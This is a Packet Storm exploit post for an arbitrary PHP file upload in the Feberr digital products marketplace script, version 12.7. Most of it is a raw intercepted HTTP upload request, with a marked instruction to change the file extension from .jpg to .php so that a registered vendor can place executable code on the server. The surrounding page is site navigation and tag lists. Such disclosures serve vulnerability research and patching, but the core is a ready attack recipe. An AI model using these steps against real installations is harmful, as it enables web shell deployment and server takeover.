Feberr 12.7 Shell Upload ≈ Packet Storm

Home^[1] Files^[2] News^[3] Contact^[4] Add New^[5]

Change Mirror^[11] Download^[12]

        # Exploit Title: Feberr - Multivendor Digital Products Marketplace arbitrary file upload
# Version  12.7
# Google Dork: N/A
# Date: 24/01/2022
# Exploit Author: Sohel Yousef - Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.
# Software Link: https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace
# Software link 2 :https://www.codecanor.com/product/feberr-multivendor-digital-products-marketplace/
# Software Demo : https://overtasks.com/demo/feberr
# Category: webapps
Feberr - Multivendor Digital Products Marketplace contain arbitrary file upload
registered vendor can upload .php files in edit-item section using tinymce with use of intercept tool in burbsuite to edit the raw
details 
after register as vendor on the system go and edit or add an item in the section of detailes there tinymce
direct link :
https://localhost/feberr/edit-item/
POST /demo/feberr/upload HTTP/1.1
Host: localhost 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------429310566417994448462725662126
Content-Length: 179156
Origin: https://overtasks.com
Connection: close
Referer: https://localhost /demo/feberr/edit-item/PFRLZAmzwdWFNWnlgxUaxbLIO
Cookie: XSRF-TOKEN=eyJpdiI6InNxSGJaQjZ0UDYzamhnT2lXL09FWmc9PSIsInZhbHVlIjoiOEZCSVBnL3orczdpc2p4RE40ZmhlWCtKck1UNURET2EwWTdyeEtDVUR0Q1pMa2RLSXphSjNTbWJnRVlNS3Jld1U2d1lucWRNMDg1RVUybWdXTlMzMDAzUHcrdjNiM0IyWXRDbk01dzJJZU0zK3ZOWFlVM2JkTFRTZzdMMGhmN1UiLCJtYWMiOiIzYzU2ZTFkNThjZGQ5ZTI0ZWNiNzUzNWEyM2E4ZTk0OTZlZWYzMDc2NDAxOWU5NjZhNjkzNzQ5ZTIzMTA2NGRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNKa1RRUHgvVStWYy85MkNuVFI2RlE9PSIsInZhbHVlIjoiUk8vMWMrS0NNLzczUWdSdFBnck1sSmdzVUhkckdQYUtORlczSGFDNWRJN1MvbGx0VGFNUkVCTS9jb1I3L25PbkdBc29hODltMXVTTVlxQVlIQ1FSaWtmVWwzWkNYVUlOQUk2Q04zbmwxdzRSQXdiRTF4WVhTTy9IaWp0V2dwM0UiLCJtYWMiOiIzMDY1ODI4ODkwZTczNjJkNjZhYmE3YjJiZWFiNzA0ODNhNTdmY2RkYjFhMmFlODQ3MTg1OTAyMDFiNWM1NjMwIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------429310566417994448462725662126
Content-Disposition: form-data; name="file"; filename="blobid1643057738041.jpg" >>>>>>>>>>>>>>> CHANGE THIS TO .php
Content-Type: image/jpeg
you will have the direct link to your uploaded file using tinymce editor 

• Follow us on Twitter^[15]
• Follow us on Facebook^[16]
• Subscribe to an RSS Feed^[17]

File Tags

• ActiveX^[18] (932)
• Advisory^[19] (76,694)
• Arbitrary^[20] (14,956)
• BBS^[21] (2,859)
• Bypass^[22] (1,518)
• CGI^[23] (1,010)
• Code Execution^[24] (6,485)
• Conference^[25] (667)
• Cracker^[26] (797)
• CSRF^[27] (3,247)
• DoS^[28] (21,564)
• Encryption^[29] (2,320)
• Exploit^[30] (49,180)
• File Inclusion^[31] (4,121)
• File Upload^[32] (934)
• Firewall^[33] (821)
• Info Disclosure^[34] (2,532)
• Intrusion Detection^[35] (845)
• Java^[36] (2,751)
• JavaScript^[37] (790)
• Kernel^[38] (5,911)
• Local^[39] (13,908)
• Magazine^[40] (586)
• Overflow^[41] (12,046)
• Perl^[42] (1,409)
• PHP^[43] (5,026)
• Proof of Concept^[44] (2,273)
• Protocol^[45] (3,239)
• Python^[46] (1,365)
• Remote^[47] (29,354)
• Root^[48] (3,432)
• Ruby^[49] (564)
• Scanner^[50] (1,628)
• Security Tool^[51] (7,636)
• Shell^[52] (3,015)
• Shellcode^[53] (1,192)
• Sniffer^[54] (877)
• Spoof^[55] (2,064)
• SQL Injection^[56] (15,872)
• TCP^[57] (2,345)
• Trojan^[58] (666)
• UDP^[59] (866)
• Virus^[60] (657)
• Vulnerability^[61] (30,167)
• Web^[62] (8,879)
• Whitepaper^[63] (3,701)
• x86^[64] (939)
• XSS^[65] (17,217)
• Other^[66]

File Archives

• February 2022^[67]
• January 2022^[68]
• December 2021^[69]
• November 2021^[70]
• October 2021^[71]
• September 2021^[72]
• August 2021^[73]
• July 2021^[74]
• June 2021^[75]
• May 2021^[76]
• April 2021^[77]
• March 2021^[78]
• Older^[79]

Systems

• AIX^[80] (423)
• Apple^[81] (1,860)
• BSD^[82] (368)
• CentOS^[83] (55)
• Cisco^[84] (1,911)
• Debian^[85] (5,947)
• Fedora^[86] (1,690)
• FreeBSD^[87] (1,241)
• Gentoo^[88] (4,151)
• HPUX^[89] (875)
• iOS^[90] (311)
• iPhone^[91] (108)
• IRIX^[92] (220)
• Juniper^[93] (67)
• Linux^[94] (41,414)
• Mac OS X^[95] (682)
• Mandriva^[96] (3,105)
• NetBSD^[97] (255)
• OpenBSD^[98] (476)
• RedHat^[99] (11,008)
• Slackware^[100] (941)
• Solaris^[101] (1,601)
• SUSE^[102] (1,444)
• Ubuntu^[103] (7,604)
• UNIX^[104] (9,016)
• UnixWare^[105] (182)
• Windows^[106] (6,268)
• Other^[107]

© 2020 Packet Storm. All rights reserved.